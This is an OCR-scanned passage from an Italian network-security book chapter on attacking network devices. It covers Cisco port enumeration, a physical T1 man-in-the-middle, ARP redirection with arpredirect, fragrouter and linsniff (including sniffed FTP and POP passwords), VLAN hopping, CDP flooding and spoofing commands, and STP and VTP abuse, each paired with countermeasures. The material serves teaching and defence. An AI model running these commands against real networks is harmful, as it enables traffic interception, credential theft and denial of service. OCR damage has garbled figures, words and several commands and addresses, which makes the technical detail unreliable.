netcat, un hacker può collegarsi alla porta e ricevere come risposta poco più che 
rumore. Se invece si collega con un browser, per esempio a 172.29.11.254:4001, il 
risultato potrebbe presentarsi in questo modo: 


User Access Verification Password: Password: Password: % Bad passwords 


Dispositivi di rete 381 


Questo output indica all’hacker che il dispositivo rilevato è molto probabilmente un 
dispositivo Cisco. 


Cisco:il servizio XRemote (9001) 


Un'altra delle porte comunemente utilizzate dai dispositivi Cisco è quella relativa al 
servizio XRemote (TCP 9001), che permette ai sistemi presenti sulla rete di aprire 
sessioni X client verso il router (tipicamente via modem). Collegandosi a questa 
porta con netcat, in risposta si ottiene un banner simile a questo: 


C:\>nc -nvv 172.29.11.254 9001 (UNKNOWN) [172.29.11.254] 9001 (?) open 
—- Outbound XRemote service — - 
Enter X server name or IP address: 


© Contromisura all’enumerazione 
e alla cattura dei banner Cisco 


Uno dei pochi rimedi per evitare questo tipo di enumerazione su sistemi Cisco con- 
siste nel limitare l’accesso ai servizi impostando delle ACL di sicurezza. A seconda 
che si scelga la regola di azzeramento o di impedire esplicitamente il transito (per 
registrare i tentativi di accesso), per i servizi XRemote è possibile utilizzare: 


access-list 101 deny tcp any any 79 log or access-list 101 deny tcp any 
=any 9001 


Vulnerabilità delle reti 


L’hacking dei dispositivi di rete è solo una questione di prospettiva. Se la vostra rete 
è sicura, in quanto avete impostato password telnet e nomi di comunità SNMP diffi- 
cili da indovinare, e limitato l’accesso a FTP e TFTP, attivando la registrazione di tut- 
ti gli eventi (ovviamente, incaricando una persona della lettura dei log!), allora que- 
sti punti deboli non dovrebbero preoccuparvi. Se, invece, la vostra rete è troppo 
estesa e complessa da gestire, allora rischiate che rimangano scoperti dispositivi 
poco sicuri. In tal caso, vi consigliamo di verificare quanto segue. 

Lo standard per il networking da cui dipendiamo attualmente in origine era costitui- 
to da due standard separati, sviluppati dalle associazioni OSI e IEEE. Con lo svilup- 
po del modello OSI, i processi di rete sono stati suddivisi in base ai diversi compiti 
da assolvere. Come si vede nella Figura 9.1, i pacchetti devono essere sottoposti a 
diverse operazioni per andare da un punto all’altro. Il modello OSI è molto ampio, 
per cui per motivi spazio non viene descritto in questo libro. Per ulteriori informa- 
zioni, visitate l'indirizzo http://users.erols.com/amecull/osi.htm. 

In questo capitolo, ci occuperemo dei primi tre livelli, privilegiando l'argomento 
delle vulnerabilità di ciascuno di essi considerato separatamente. L'attacco ai punti 
vulnerabili basato su questi standard aumenterà i rischi di auditing e segmentazione 
in futuro. Tenete presente che se esistono vulnerabilità a un singolo livello, le co- 
municazioni vengono compromesse senza che questo sia rilevato sugli altri livelli. 
La crittografia end-to-end e altri sistemi affidabili possono giovare alla sicurezza, ma 


è meglio considerarla come “l'ultima spiaggia”, anziché come prima e unica linea di 
difesa. 
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Figura 9.1 
Architettura di rete basata sul modello OSI, 


CI Phenoelit 


Un libro sulla sicurezza delle reti non sarebbe completo senza un paragrafo dedicato a 
Phenoelit. Il suo insieme di tool TRPAS comprende quelli più utili per la valutazione def- 
le vulnerabilità. A partire dal 2002, sono stati rilasciati importanti exploit per i modelli di 
apparecchiature più diffusi nelle sedi delle aziende. AI Defcon X, FX ha presentato 
un'analisi dettagliata del suo overflow remoto del huffer Cisco e di possibili compromis- 
sioni con abilitazione remota (http://ww.phenoelit.de/stuff/defconX,pdf). Que- 
sto capitolo descrive le opportune contromisure. 


OSI Livello | 


Con chiunque decidiate di comunicare, le comunicazioni dovranno transitare su un 
provider: la società telefonica locale, un fornitore di servizi satellitari o un fornitore 
locale di servizi televisivi. Qualsiasi supporto delle comunicazioni passa per le cabi- 
ne telefoniche e corre sotto chilometri di strade, è aperto al pubblico 0 nascosto, © 
protetto da semplici lucchetti (la cui combinazione può talvolta essere scoperta me- 
diante tecniche primitive di ingegneria sociale). Le possibilità sono infinite e la po- 
sta in gioco è notevole. Talvolta la sicurezza a livello hardware viene trascurata e 
costituisce l'anello più debole della catena, 

La fibra ottica è il mezzo più difficile da intercettare poiché è appariscente e le appa- 
recchiature sono costose. La maggior parte dei collegamenti ta una città e l'altra sono 
realizzati tramite fibra ottica. Sebbene siano difficilmente intercettabili, nc vale la pe- 
na, Tuttavia le probabilità non sono a favore dell'aggressore. I cavi coassiali sono fa- 
cilmente jntercetiabili, ma non sono particolarmente diffusi. Ethemet (10, 100, 
1000BaseT) è fo standard più diffuso nelle cabine delle reti e può essere facilmente 
intercettato senza che ce ne si avveda. Il bersaglio più facile dell'hacking del Livello 1 
è costituito però dai link T1. Poiché essi sono formati da due semplici coppie di fili e 
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sono normalmente link Internet, è agevole rimuovere un link T1 e inserire al suo po- 
sto un dispositivo Man-In-The-Middle (come mostrato nella Figura 9.2), che consente 
di acquisire tutte le connessioni esterne. Le cabine telefoniche con condivisione sono 
un facile bersaglio e consentono agli hacker di raggiungere l’ambita meta dell'accesso 
anonimo, Per creare un perfetto dispositivo Man-In-The-Middle è sufficiente disporre 
di un router 1600 Cisco, anche di tipo economico. Sulla maggior parte dei circuiti vie- 
ne apposta un'etichetta con il nome dell'azienda e l’identificazione del circuito. Utiliz- 
zando un piccolo router con due CSU/DSU e un'interfaccia Ethernet, è possibile inse- 
rire un semplice ponte Man-In-The-Middle provocando una disconnessione per soli 
5-10 secondi, che non verrà rilevata dall'utente finale. 


TI normale prima di un attacco Man-In-The-Middle 


Ethernet CSU/DSU Scheda NIU 


Router 


Dopo un attacco Man-In-The-Middle 
Ethernet CSU/DSU DSU/CSU CSU/DSU 


Mise 
Router Ethernet 


Router Man-In-The-Middle 
in modalità Brindging Apparecchio telefonico 


Figura 9.2 
Attacco fisico Man-In-The-Middle. 


Quando viene inserito e attivato un dispositivo “Man-In-The-Middle”, il traffico può 
essere intercettato e analizzato. I protocolli sicuri sono solo parzialmente tali; qual- 
siasi traffico normale può essere intercettato. 

Le connessioni tra ufficio e ufficio sono una necessità imprescindibile nelle aziende. 
I link point-to-point T1 sono facilmente installabili; ma c'è un piccolo problema. Un 
attacco Man-In-The-Middle su un T1 interno di un ufficio consente all’aggressore 
non solo di accedere regolarmente alla rete interna, ma anche di penetrarvi. Questo 
problema, comunemente trascurato, si è verificato in diverse aziende di grandi di- 
mensioni. 
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OSI Livello 2 


Il Livello 2 è quello in cui agli impulsi elettrici provenienti dal Livello 1 vengono as- 
sociati degli indirizzi MAC. Questo livello, se non viene configurato correttamente, 
è l'anello più debole della catena. 


Rilevamento dei supporti del Livello 2 


I supporti condivisi (Ethernet e Token Ring) sono stati il mezzo tradizionale per la tra- 
smissione dei dati per quasi vent'anni. La tecnica utilizzata da Ethernet, nota come 
CSMA/CD (Carrier Sense Multiple Access /Collision Detection), è stata ideata da Bob 
Metcalfe presso il PARC (Palo Alto Research Center) di Xerox. L'Ethernet classica funzio- 
na inviando i dati a ogni nodo presente sul segmento. In questo modo, il destinatario ri- 
ceve i dati (ma lo stesso succede a tutti gli altri) e condivide la velocità di trasmissione 
con chiunque sia attaccato al cavo. Questo è il problema: se si inviano i dati su un sup- 
porto condiviso, in pratica qualsiasi dispositivo in ascolto sul segmento è in grado di 
leggerli. Dal punto di vista della sicurezza, Ethernet è sinonimo di compromesso. E, 
sfortunatamente, la Ethernet condivisa è ancora il supporto di rete più utilizzato. 

Ma la tecnologia Ethernet originale è distante anni luce dalla tecnologia commutata 
disponibile oggi, con la quale condivide solo il nome. La tecnologia a commutazio- 
ne si basa su una grande tabella di indirizzi MAC (Media Access Control) e, per in- 
viare il traffico destinato a uno specifico MAC, utilizza un chip in silicio velocissimo. 
Il risultato: il pacchetto arriva soltanto al legittimo destinatario e rimane invisibile a 
chiunque altro, o quasi. 

È possibile realizzare sistemi per la cattura dei pacchetti su supporti commutati. Cisco 
offre qualcosa del genere negli switch Catalyst, con la tecnologia SPAN (Switched Port 
Analyzer). Duplicando certe porte o reti locali virtuali VLAN (Virtual! Local Area 
Network) su una singola porta, un amministratore è in grado di catturare i pacchetti 
esattamente come se si trovassero su un segmento condiviso. Il più delle volte questa 
possibilità viene utilizzata nei sistemi IDS Untrusion Detection System) per consentire 
l’analisi del traffico e intercettare eventuali attacchi. Per maggiori informazioni sulla 
tecnologia SPAN, vi rimandiamo alla pagina http://ww.cisco.com/univercd/ 
cc/td/doc/product/lan/cat5000/rel 4, 5/config/span.htm. 

Ancora più deleteria per gli switch è la tecnologia dsniff di Dug Song. Dug ha svi- 
luppato un software in grado di catturare il traffico in transito su un dispositivo 
commutato e reindirizzarlo da uno specifico host verso il sistema di intercettazione. 
La tecnologia è banale da implementare e mette in discussione la fama secondo cui 
gli switch sono dispositivi sicuri. 


Sniffing di uno switch di rete 


Avete appena installato il vostro switch nella speranza di raggiungere il massimo 
consentito dalle possibilità della rete: aumentare la rapidità e i livelli di sicurezza. La 
prospettiva di aumentare la velocità e di impedire agli utenti curiosi di intercettare 
informazioni riservate sulla rete aziendale, vi rende felici, Il vostro nuovo switch è la 
soluzione di tutti i vostri problemi? Fra un po’ vi ricrederete. 

Il protocollo ARP (Address Resolution Protocol, RFC 826) consente di mappare dina- 
micamente un indirizzo IP a 32 bit su un indirizzo hardware a 48 bit. Quando un si- 
stema deve comunicare con i suoi vicini sulla stessa rete (compreso il gateway pre- 
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definito), invia dei broadcast ARP alla ricerca dell'indirizzo hardware del sistema di 
destinazione. Il destinatario risponderà alla richiesta ARP con il suo indirizzo hard- 
ware, dando così inizio alla comunicazione. 

Sfortunatamente, però, il traffico ARP può essere facilmente contraffatto per essere 
reindirizzato verso un sistema pirata e questo può verificarsi anche in un ambiente 
commutato. Infatti, è possibile visualizzare il traffico reinstradato, utilizzando un 
analizzatore di rete e in seguito inoltrarlo verso la destinazione reale. Questo scena- 
rio è noto come attacco “Man-In-The-Middle” ed è relativamente semplice da porta- 
re a termine. Vediamo un esempio. 


CD) Reindirizzamento ARP 


Diffusione: 4 
Semplicità: 2 
Impatto: 8 
Fattore di rischio: 5 


In questo esempio collegheremo tre sistemi a uno switch di rete. Il sistema crush è il 
gateway predefinito all’indirizzo IP 10.1.1.1. Il sistema shadow è l’host da cui ha origi- 
ne il traffico e si trova all'indirizzo 10.1.1.18. Il sistema twister è il sistema pirata 
(“Man-In-The-Middle”) e si trova all'indirizzo 10.1.1.19. L'attacco prevede che su 
twister venga eseguito il programma di utilità arpredirect del pacchetto dsniff 
di Dug Song (http://www.monkey.org/-dugsong/dsniff/). Questo strumento con- 
sente di intercettare sulla LAN i pacchetti che l’host obiettivo invia a un altro host 
(generalmente il gateway predefinito, come mostrato nella Figura 9.3). 


Prima di provare questa tecnica nel vostro ambiente di rete, consultate 
Ù l'amministratore del sistema. Se nello switch è attiva la modalità di prote- 
zione delle porte, correte il rischio di bloccare l'accesso a tutti gli utenti. 


Ricordate che siamo connessi a uno switch e che pertanto dovremmo essere in gra- 
do di visualizzare solo il traffico di tipo broadcast. 

In realtà, come mostreremo più avanti, arpredirect consente di visualizzare tutto il traf- 
fico tra i sistemi shadow e crush, Sul sistema twister eseguiamo il comando seguente: 


[twister] ping crush 

PING 10.1.1.1 from 10.1.1.19 : 56(84) bytes of data. 
64 bytes from 10.1.1.1: icmp_seq=0 tt1=128 time=1.3 ms 
[twister] ping shadow 


PING 10.1.1.18 from 10.1.1.19 : 56(84) bytes of data. 
64 bytes from 10.1.1.18: icmp_seq=0 ttl=255 time=5.2 ms 


Questo comando consente a twister di registrare gli indirizzi hardware dei due si- 
stemi, che saranno necessari durante l’esecuzione di arpredirect: 


[twister] arpredirect -t 10.1.1.18 10.1.1.1 
intercepting traffic from 10.1.1.18 to 10.1.1.1 (°C to exit)... 


Questo comando esegue arpredirect e reindirizza verso twister tutto il traffico 
proveniente da shadow e destinato al gateway predefinito: crush. Il servizio IP 
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3) Inviate i pacchetti 
ARP contraffatti 
da BOB eseguendo 


il comando arpredirect 
< ; ; di 
i |) Attivare il servizio 
> | IP forwarding a livello 


4) Tutto il traffico originato det'termel.0 utilizzando 


da SALLY e destinato il programma fragrouter 
a un qualunque sistema dalla riga di comando 
SALLY che si trova oltre il gateway BOB 


10.1.1.12 predefinito verrà inviato 10.1.1212 2) Eseguite 
a BOB consentendo l’analizzatore 
l'intercettazione delle informazioni di pacchetti preferito 


Gateway predefinito 
10.1.1.1 


Figura 9.3 


La possibilità di intercettare i pacchetti ARP dovrebbe essere un motivo sufficiente per non lasciare 
che la vostra sicurezza dipenda dagli switch di rete. 


forwarding viene anche attivato, per farlo agire come router e reindirizzare il traffi- 
co da shadow a crush, dopo averlo intercettato. Esistono due modi per abilitare l'IP 
forwarding: a livello di kernel (pratica sconsigliata perché i pacchetti di redirezione 
ICMP inviati potrebbero corrompere l’intero processo), oppure dalla riga di coman- 
do utilizzando il programma di utilità fragrouter (http://packetstormsecuri- 
ty.org/), specificando l'opzione -B1: 


[twister] fragrouter -BI 

fragrouter: base-1: normal IP forwarding 

10.1.1.18.2079 > 192.168.20.20.21: S 592459704:592459704(0) 
10.1.1.18.2079 > 192,168.20.20.21: P 592459705:592459717(12) 
10.1.1.18.2079 > 192.168.20.20.21: . ack 235437339 
10.1.1.18.2079 > 192.168.20.20.21: P 592459717:592459730(13) 
<output abbreviato> 
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Per finire, è necessario installare su twister un semplice analizzatore di pacchetti 
che consenta di catturare il traffico più interessante. Per ulteriori informazioni sugli 
analizzatori di pacchetti, fate riferimento al Capitolo 5: 


[twister] linsniff 

Linux Sniffer Beta v.99 

Log opened. 

—_—-_-—-— [SYN] (Slot 1) 
10.1.1.18 => 192.168.20.20 [21] 


USER ploessel 
PASS not-very-secret!! 
PORT 10,1,1,18,8,35 


——-—-—-—-- [SYN] (slot 1) 
10.1.1.18 => 192.168.20.20 [110] 
USER ploessel PASS g@Othacked 
[FIN] (1) 


Esaminiamo quello che è successo. Dopo aver eseguito arpredirect, twister ini- 
zia a inviare a shadow delle risposte ARP contraffatte, spacciandosi per crush. sha- 
dow aggiorna la sua tabella ARP per tenere conto del nuovo indirizzo hardware di 
crush. A questo punto, un utente di shadow avvia una sessione FTP e POP all’indi- 
rizzo 192.168.20.20. Tuttavia, il traffico generato non viene inviato al gateway pre- 
definito legittimo, crush, in quanto shadow è stato ingannato e nella sua tabella ARP 
all'indirizzo IP di shadow è stato associato l’indirizzo hardware di twister. Poiché è 
stato attivato il servizio IP forwarding, twister agisce come un router e reindirizza 
tutto il traffico verso il sistema all’indirizzo 192.168.20.20. 

Nell'esempio precedente, abbiamo solo reindirizzato il traffico da shadow a crush. 
Tuttavia è anche possibile reinstradare il traffico verso twister omettendo l’opzio- 
ne -t: 


[twister] arpredirect 10.1.1.1 
intercepting traffic from LAN to 10.1.1.1 (*C to exit)... 


Ricordate che questo può provocare il panico su una rete molto trafficata. Se siete 
allergici a UNIX, molto probabilmente vi state chiedendo se è possibile utilizzare 
arpredirect su un sistema Windows. Sfortunatamente, non esiste una versione di 
arpredirect per Windows, ma naturalmente sono disponibili delle alternative. In 
alcuni switch è possibile utilizzare, per la connessione di rete, la porta uplink di un 
semplice hub. Questo consente di collegare all’hub un sistema UNIX, su cui viene 
eseguito arpredirect e un sistema Windows, su cui viene eseguito l’analizzatore di 
pacchetti desiderato. Il sistema UNIX reindirizza il traffico, mentre il sistema Win- 
dows lo intercetta in transito sull’hub locale. 


Contromisure al reindirizzamento ARP 


Nella maggior parte dei sistemi connessi alla rete locale, è banale contraffare le ri- 
sposte ARP e corrompere la tabella ARP per reindirizzare il traffico verso un sistema 
pirata. Se è possibile e attuabile, impostate degli instradamenti ARP statici tra sistemi 
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critici; infatti, una tecnica comune consiste nell'impostare degli instradamenti ARP 
statici tra il firewall e i router esterni. Per fare questo, utilizzate i comandi seguenti: 


[shadow] arp -s crush 00:00:C5:74:EA:B9 
{shadow] arp -a 
crush (19.1.1.1) at 00:00;C5:74:EA:B0 [ether] PERM on ethQd 


Notate che il flag PERM indica che si tratta di un instradamento ARP permanente. 
L'impostazione di instradamenti statici, per i sistemi interni della rete, non è sicura- 
mente uno degli esercizi più pratici di questo mondo. Per tenere traccia delle asso- 
ciazioni ARP FEthernevindirizzo IP e ricevere la notifica di tutte le eventuali modifi- 
che, è possibile utilizzare uno strumento come arpwatch (ftp://ftp.ee.lbl. 
gov/arpwatch-2.1a6.tar.gz). 

Eseguite arpwatch utilizzando l'interfaccia che desiderate tenere sotto controllo: 


{crush] arpwatch -i rl@ 


Come mostrato più avanti, arpwatch ha rilevato la presenza di arpredirect e l'ha 
registrata in /var/log/messages: 


May 21 12:28:49 crush: flip flop 10.1.1.1 0:50:56:bd:2a:f5 
(0:0:c5:74:ea:b0) 


L'inserimento manuale degli indirizzi MAC in ciascuno switch è la contromisura più 
sicura per gli attacchi al protocollo ARP, sebbene rappresenti l'incubo di ogni am- 
ministratore di sistema: 


set port security <mod/port> enable 00-02-2D-01-02-0F 


Quando occorre inviare numerose risposte ARP, può essere inviata una notifica per 
posta elettronica. arpwatch non è una soluzione efficace, sebbene si tratti di un si- 
stema utile di notifica in tempo reale della presenza di un malintenzionato. 


® Salti sulle VLAN 


Le LAN virtuali sono LAN separate logicamente ma situate sullo stesso supporto fisi- 
co. A ciascuna LAN è assegnato un numero VLAN univoco, Talvolta le VLAN vengo- 
no ampliate oltre un singolo switch tramite l’utilizzo di circuiti di collegamento. 
802.1q è lo standard del nuovo proprietario per i circuiti di collegamento. Il circuito 
di collegamento connette VLAN simili a diversi switch. Il Trunking Protocol avvolge 
il frame Ethernet mentre lo inoltra alla sua destinazione. 

Le VLAN sono diffuse negli ambienti di rete, ma molte volte sono configurate e uti- 
lizzate in modo scorretto. Le VLAN sono state progettate pensando soprattutto alla 
sicurezza. Dato il numero di VLAN utilizzate attualmente per potenziare la sicurez- 
za, questo può costituire un problema. Per comprendere i difetti connessi all'imple- 
mentazione delle VLAN, dobbiamo esaminare la composizione dei pacchetti. 


Header IP 


L'intestazione IP è necessaria per tutti i pacchetti IP inviati sulla rete. Essa contiene 
gli indirizzi IP di origine e di destinazione e altre informazioni importanti. 
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Header TCP 


L'header TCP contiene le porte di origine e di destinazione, un numero sequenziale e i 
flag TCP. Nell'implementazione Cisco del 802.1q, il tag ha una lunghezza di 4 byte ed 
è nel formato “Ox 80 00 On nn”, dove “n nn” indica l’identificatore della LAN virtuale. Il 
tag viene inserito nel frame Ethernet subito dopo l’indirizzo MAC di origine. Pertanto, 
in un frame Ethernet che entra nello switch 1 sulla porta appartenente a VLAN 2 viene 
inserito il tag “80 00 00 02”, Il frame 802.1q attraversa il circuito dello switch e il tag vie- 
ne eliminato dal frame prima che questo lasci la porta dello switch di destinazione: 


+o4-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+4-+-+-+ +-+-+-+ 
iDestination| Source | Tag Protocol.. .. conti 
| Address | Address I Identifier .. .. Ì 
+-+4-+-++-+++-+++-+-+-+-+-+-+-t-+-+ +-+-+-+ 
iPri. {F{ Virtual Lan i 

{Ident{C} Identification : 

+++ +-+-+-+-+-+-+-4-+-+-+-+-+-+ +-+-+-.+-+-+-.+ 


| | Packet vin a. Packet | 
] | Data 46-1500 octets se nie Data conbi 
Fb tot ++ +-+-+-t-t-+.+.+.t.+.+ +-+-+-+4-+-+.+ 
i 
RIFGS\. | 
+-+-+-+-+ 


Molti amministratori commettono errori nella configurazione delle VLAN, come si 
vede nella figura seguente. In condizioni specifiche, è possibile iniettare alcuni fra- 
me in una VLAN affinché i dati “saltino” su un’altra. Se le VLAN sono utilizzate per 
mantenere la sicurezza tra due segmenti di rete, questo è un problema. 


VLAN-I 
(nativa) 


Quando un host è connesso a una porta VLAN nativa, non viene aggiunta alcuna in- 
testazione VLAN. Questo in teoria è corretto, sebbene rappresenti un rischio per la 
sicurezza. Se gli aggressori riescono ad accedere a una porta nativa, essi avranno la 
possibilità di “saltare” su qualsiasi VLAN. Sono disponibili diversi tool che consento- 
no di verificare la presenza di questa vulnerabilità dovuta a un errore di configura- 
zione. 
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CD) Il CDP 


Il CDP (Cisco Discovery Protocol) è un protocollo proprietario Cisco per la condivi- 
sione delle informazioni. Esso non è instradato ed è accessibile unicamente per il 
segmento locale. Il CDP mette in comune informazioni quali il modello del router, 
la versione del software e gli indirizzi IP. Nessuna informazione si serve dell’auten- 
ticazione; le informazioni sono sempre trasferite come testo in chiaro. 


C) IRPAS e CDP 


Diffusione: 5 
Semplicità: 10 
Impatto: 8 
Fattore di rischio: 8 


L'IRPAS (Internetwork Routing Protocol Attack) di Phenoelit (http://www.phe- 
noelit.de/fr/tool.html) è una suite software, composta da diversi tool. CDP 
è un tool UNIX a riga di comando contenuto in IRPAS. FX scoprì che il Cisco 
IOS utilizza l'ID del dispositivo per individuare se un messaggio ricevuto è un 
aggiornamento e se il messaggio vicino è già noto. Apparentemente, se l'ID del 
dispositivo è eccessivamente lungo, il test fallisce e riempie continuamente la 
memoria del router. 

Per utilizzare CDP, dovete specificare l'interfaccia Ethernet su cui intendete lavorare 
(«i eth0); tutte le altre opzioni sono facoltative. Ecco un esempio: 


./cdp -i eth0 -n 10000 -1 1480 -r 


Se l'aggressore ha intenzione di effettuare il flooding completo di un router, avvierà 
due processi di CDP aventi dimensioni diverse: uno con la massima dimensione 
(1480) per riempire la maggior parte della memoria, un altro per riempire il resto 
della memoria con una lunghezza di dieci ottetti. 

La seconda modalità del funzionamento del tool CDP di Phenoelit è lo spoofing. 
Attivate questa modalità con l'opzione da riga di comando -m 1. Lo spoofing non 
ha alcuna utilità pratica per gli attacchi a un router, sebbene possa essere utilizza- 
to per l'ingegneria sociale o semplicemente per confondere le idee all'amministra- 
tore locale. Esso viene utilizzato per inviare pacchetti di informazione CDP con il 
100% di validità, che sembrano essere generati da altri router Cisco. In questo 
caso potete specificare voi stessi qualsiasi parte di un messaggio CDP. Un esem- 
pio è il seguente: 


.-/cdp -v -i eth0 -m 1 -D 'Hacker' -P '‘Ethernet@' -C RI \ 
-L ‘Intel' -S "'uname -a°" -F '255.255.,255.255' 


In questo modo il router Cisco visualizza le informazioni seguenti: 


cisco#sh cdp neig detail 
Device ID: Hacker 
Entry address(es): 
IP address: 255,255,255.255 
Platform: Intel, Capabilities: Router IGMP 
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Interface: Ethernet@, Port ID (outgoing port): Ethernet@ 
Holdtime : 238 sec 


Version : 
Linux attack 2.2.10 #10 Mon Feb 7 19:24:43 MET 2000 i686 unknown 


A meno che il CDP non sia indispensabile, esso deve essere sempre disattivato glo- 
balmente su ciascuna interfaccia, come mostrato di seguito: 


Router(config)#no cdp run 
Router(config-if)#no cdp enable 


® STP 


Per prevenire i broadcast storm e altri effetti collaterali indesiderati del looping, 
venne creato l’STP (Spanning Tree Protocol), corrispondente allo standard 802.1d. 
L'STP utilizza STA (Spanning Tree Algorithm), che rileva che lo switch dispone di 
diversi modi per comunicare con un nodo, stabilisce qual è il modo migliore e bloc- 
ca l’altro o gli altri percorsi. Ciascuno switch sceglie i percorsi di rete che utilizzerà 
per ogni segmento. Queste informazioni sono condivise da tutti gli switch mediante 
frame di rete chiamati BPDU (Bridge Protocol Data Units). 

Un aggressore multihomed su un’area STP partecipante è in grado di falsificare la 
priorità di un ponte STP impostandola a un valore inferiore a quello di un ponte di 
root corrente. Se questo si verifica, l'aggressore può assumere la funzione del ponte 
di root e influire sulla topologia STP attiva, reindirizzando in questo modo tutto il 
traffico di rete sul suo sistema. Il ricalcolo STP permanente provocato dall’introdu- 
zione temporanea e dalla successiva rimozione di dispositivi STP con bassa priorità 
(priorità zero) del ponte rappresenta una forma semplice di attacco DoS o di attacco 
Man-In-The-Middle. È possibile utilizzare tool quali brconfig per influenzare l'STP. 
Per proteggersi da questo attacco, occorre attivare portfast sulle interfacce dei 
nodi estremi. Ai dispositivi che stanno dietro una porta con STP portfast atti- 
vato non è consentito influenzare la topologia STP: 


Switch(config)#spanning-tree portfast bpduguard 


O) VTP 

Il VTP (VLAN Trunking Protocol) è un protocollo di messaggistica centrale che 
mantiene la coerenza della configurazione delle VLAN gestendo l'aggiunta, la 
cancellazione e la ridefinizione delle VLAN all’interno di un dominio VTP, Un 
dominio VTP (anche detto dominio di gestione delle VLAN) è costituito da uno 
o più dispositivi di rete che condividono lo stesso nome di dominio VTP. Tutti i 
dispositivi devono essere interconnessi mediante circuiti di collegamento, poi- 
ché VTP comunica unicamente sulle porte di tali circuiti. Gli aggressori che rie- 
scono ad accedere a una di queste porte possono inviare messaggi VTP come 
un server privo di VLAN configurate. Se questo si verifica, verranno cancellate 
tutte le VLAN dell'intero dominio VTP. È nota l’esistenza di tool automatizzati 
che circolano nella comunità degli hacker. 
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Contromisure per VTP 


Il VTP può provocare più problemi di quanti ne risolva; è consigliabile definire una 
password e impostare la modalità vtp a transparent, come mostrato di seguito: 


Router(config)#vtp domain <vtp.domain> password <password> 
Router(config)#vtp mode transparent 


OSI Livello 3 


Come nella maggior parte dei sistemi, deve essere creata una lista di controllo della 
sicurezza prima di collegare qualsiasi apparecchiatura. È consigliabile utilizzare il 
modello IOS sicuro (http://www.cymru.com/Documents/secure-ios-template 
«html) di Rob Thomas. 


® Internet Protocol versione 4 (IPv4) 


L'Internet Protocol versione 4 non ha alcuna funzionalità di sicurezza incorporata. 
La maggior parte del traffico Internet dipende da IPv4 ed è a rischio, Una contromi- 
sura efficace presuppone che prendiate atto della mancanza di sicurezza e pianifi- 
chiate in anticipo una strategia. Dedicate il tempo necessario all’implementazione di 
qualche tipo di linea di difesa. Le misure di sicurezza affidabili non si trovano nella 
configurazione di default del prodotto. 


® Previsione del numero di sequenza TCP 


Per avviare ogni sessione TCP viene inviato un pacchetto SYN. Il primo pacchetto 
SYN contiene un numero iniziale casuale, chiamato numero di sequenza. Per ogni 
pacchetto successivo della sessione TCP il numero di sequenza è incrementato di 
un'unità. Se un host riceve un pacchetto una porta e un IP di origine corretti, esso 
controlla il numero di sequenza; se il numero corrisponde, il pacchetto e i relativi 
dati vengono considerati fidati. Con alcune versioni di IOS meno recenti, questo nu- 
mero di sequenza può essere indovinato. A partire da IOS 12.0(15) e 12.1(7), questo 
problema è stato risolto. Se il numero di sequenza può essere indovinato, si posso- 
no facilmente iniettare pacchetti contraffatti, con conseguente compromissione dei 
dati, Denial of Service o dirottamento della sessione. 


® IP Versione 6 o IP:Next Generation (IPng) 


L'IPv6 UP Versione 6) è destinato a sostituire l’IPv4, soprattutto a causa della presunta 
mancanza dello spazio degli indirizzamenti di IPv4. L'IPv6 utilizza un indirizzo IP a 128 
bit composto da otto numeri interi a 16 bit, separati da due punti, Eccone un esempio: 


ABCD:EF01:2345:6789:0123:4567:8FF1:2345 


IPv6 contiene diverse nuove funzionalità, tra cui la sicurezza nativa, Molte VPN ad 
alta sicurezza si servono dell'IPSec Encryption framework (RFC 2401). Con l'IPv6, tut- 
to il traffico verrà protetto conformemente a questo standard evoluto con IPv6 IPSec, 
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È possibile utilizzare due diversi metodi di crittografia. La modalità tunnel cripta l’inte- 
ro pacchetto IP, i dati di protocollo e il payload. Viceversa, la modalità transport cripta 
unicamente il livello di trasporto (cioè TCP,UDP e ICMP). Entrambi i metodi sono 
probabilmente affidabili come sostituti di IPv4. Poiché non è facile familiarizzare con 
l'IPv6, i gateway sono aperti e disponibili per chiunque desideri effettuare test su tale 
protocollo. Per maggiori informazioni, visitate l'indirizzo http: //ww.6bone.net. 


® TCPDump 


Diffusione: 9 
Semplicità: 8 
Impatto: 8 
Fattore di rischio: 9 


TCPDump è il più diffuso tra gli sniffer del traffico di rete. Esso può essere utilizzato 
per stampare gli header dei pacchetti o per visualizzare quelli del traffico di rete. 
Utilizzate questo tool per identificare i problemi di rete, rilevare “attacchi ping” o 
monitorare l’attività della rete. 

Di seguito potete vedere l'output del comando tepdump che visualizza una sessione 
SSH tra client e server: 


root@server:/# tcepdump -c 2 

20:33:06.635019 server.ssh > client.58176: P 2280871205:2280871225(20) ack 
2027404582 win 16060 (DF) [tos @0x10] (ttl 64, id 15592, len 60) 
20:33:06.640567 server.ssh > client.58176: P 20:304(284) ack 1 win 16060 
=(DF) 

[tos 09x10) (ttl 64, id 15595, len 324) 

root@server:/# 


Quando viene utilizzata l’espressione -X, tutto il traffico di rete è visualizzato anche 
nel formato esadecimale e ASCII, compresi gli header IP e TCP: 


root@server:/ # tepdump -vvv -X -c 2 

tcepdump: listening on eth@ 

20:33:06.635019 nst.aol.com.ssh > 66-19-0-26.gen.isp.net.58176: P 
2280871205:2280871225(20) ack 2027404582 win 16060 (DF) [tos 0x10] 
(ttl 64, id 15592, len 60) 


0x0000 = 4510 003c 3ce8 4000 4006 42bf d829 a001 E..<<,0,@.Bi.).. 
0x0010 = 42c0 001a 0016 e340 87f3 5525 78d7 bd26 Bici «@..U%X..& 
0x0020 5018 3ebc fafe 0000 0000 000b cdc7 89db Piareagnitveria 
0x0030 1e0b 5973 cegl Ys 


20:33:06.640567 ns1.aol.com.ssh > 66-19-0-26.gen.isp.net.58176: P 20:304(284) 
ack 1 win 16060 (DF) [tos 0x10] (ttl 64, id 15595, len 324) 


0x0000 = 4510 0144 3ceb 49000 4006 41b4 d829 2001 E..D<.@.@.A..).. 
0x0010  42c0 001a 0016 e340 87f3 5539 78d7 bd26 Bi... Lu @..U9Xx..& 
0x0020 5018 3ebc a4d9 0000 0000 2110 6130 f24a PoPrgons neo ad.J 


Mie ** d307 6681 8816 = = o=—=©— <= diri 
root@server:/ # 


dsniff 


Utilizzare il programma di utilità tcpdump per stabilire il tipo di supporto, va bene; ma 
come fare per impadronirsi delle password, che sono i gioielli della corona del mondo 
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dei computer? Potreste acquistare un pacchetto software come SnifferPro per Win- 
dows, prodotto da NAI, o uno meno costoso come CaptureNet di Laurentiu Nicula, ma 
la soluzione di gran lunga migliore è sicuramente il prodotto sviluppato da Dug Song 
(http://naughty.monkey.org/-dugsong/dsniff/). Dsniff rappresenta uno degli 
strumenti di intercettazione delle password più sofisticati al momento disponibili. 

